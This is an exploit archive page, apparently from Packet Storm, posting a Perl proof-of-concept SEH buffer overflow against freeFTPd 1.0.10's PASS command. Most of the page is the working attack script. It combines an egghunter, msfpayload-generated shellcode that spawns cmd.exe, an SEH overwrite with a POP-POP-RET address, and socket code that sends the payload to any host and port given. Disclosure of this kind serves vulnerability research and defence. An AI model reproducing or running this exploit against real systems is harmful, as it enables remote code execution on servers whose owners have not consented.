accept no compromises

freeFTPd 1.0.10 Buffer Overflow

freeFTPd 1.0.10 Buffer Overflow
Posted Aug 21, 2013
Authored by Wireghoul | Site justanotherhacker.com

freeFTPd version 1.0.10 PASS command SEH buffer overflow exploit.

tags | exploit, overflow
MD5 | 706f878acc4678d22b7b11d8bf0d6c7f

freeFTPd 1.0.10 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
# freeFTPd 1.0.10 anonymous-auth PASS SEH buffer overflow
# PoC by Wireghoul - www.justanotherhacker.com
# Date: 20130820
# Tested on: XPSP3
# Similar exploits:
# EDB 23079 1330 1339
# Greetz corelan, TecR0C, mr_me, jjkakakk

if (scalar(@ARGV) != 2) { "Usage $0 host port\n"; exit; }
use IO::Socket::INET;
# Null byte in ppr forces a backwards short jump allowing 128 bytes
shellcode max
# Thus we use an egghunter
my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"WRGL".
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# I expect the max lenght for this is ~1024 bytes, didn't bother checking
# Spawn cmd.exe from msfpayload windows/exec CMD=cmd.exe R | msfencode -b
'\x0a\x0d' -t perl
my $shell =
"\xd9\xeb\xd9\x74\x24\xf4\x5e\xbf\xe0\xdd\xfb\x11\x33\xc9" .
"\xb1\x32\x31\x7e\x1a\x83\xc6\x04\x03\x7e\x16\xe2\x15\x21" .
"\x13\x98\xd5\xda\xe4\xfb\x5c\x3f\xd5\x29\x3a\x4b\x44\xfe" .
"\x49\x19\x65\x75\x1f\x8a\xfe\xfb\xb7\xbd\xb7\xb6\xe1\xf0" .
"\x48\x77\x2d\x5e\x8a\x19\xd1\x9d\xdf\xf9\xe8\x6d\x12\xfb" .
"\x2d\x93\xdd\xa9\xe6\xdf\x4c\x5e\x83\xa2\x4c\x5f\x43\xa9" .
"\xed\x27\xe6\x6e\x99\x9d\xe9\xbe\x32\xa9\xa1\x26\x38\xf5" .
"\x11\x56\xed\xe5\x6d\x11\x9a\xde\x06\xa0\x4a\x2f\xe7\x92" .
"\xb2\xfc\xd6\x1a\x3f\xfc\x1f\x9c\xa0\x8b\x6b\xde\x5d\x8c" .
"\xa8\x9c\xb9\x19\x2c\x06\x49\xb9\x94\xb6\x9e\x5c\x5f\xb4" .
"\x6b\x2a\x07\xd9\x6a\xff\x3c\xe5\xe7\xfe\x92\x6f\xb3\x24" .
"\x36\x2b\x67\x44\x6f\x91\xc6\x79\x6f\x7d\xb6\xdf\xe4\x6c" .
"\xa3\x66\xa7\xfa\x32\xea\xd2\x42\x34\xf4\xdc\xe4\x5d\xc5" .
"\x57\x6b\x19\xda\xb2\xcf\xd5\x90\x9e\x66\x7e\x7d\x4b\x3b" .
"\xe3\x7e\xa6\x78\x1a\xfd\x42\x01\xd9\x1d\x27\x04\xa5\x99" .
"\xd4\x74\xb6\x4f\xda\x2b\xb7\x45\xb9\xa6\x23\x48\x58\x41" .
"\xc9\x94";
my $egg = "USER WRGLWRGL$shell\r\n";
my $usr = "USER anonymous\r\n"; # Must be an existing anonymous account
# I'm lazy, NOPs are fine by me
my $pre = "PASS " . "\x90" x (797 - length($egghunter)) . $egghunter;
my $seh1 = "\x90\x90\xEB\x80"; # nop, nop, jmp+4
my $seh2 = "\xf0\x42\x41\x00"; # PPR from freeFTPDService.exe (only unsafe
SEH module), 0x004142f0
my $pad = "X" x 209 ."\r\n";

my $payload = $pre . $seh1 . $seh2 . $pad;

my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
connect!\n";
my $eggsock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
connect!\n";
print $eggsock $egg;
sleep 1;
print $sock $usr;
sleep 1;
print "Preparing exploit\n";
sleep 1;
print $sock $payload;
print "Exploiting\n";
sleep 3;
print "Done\n";

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close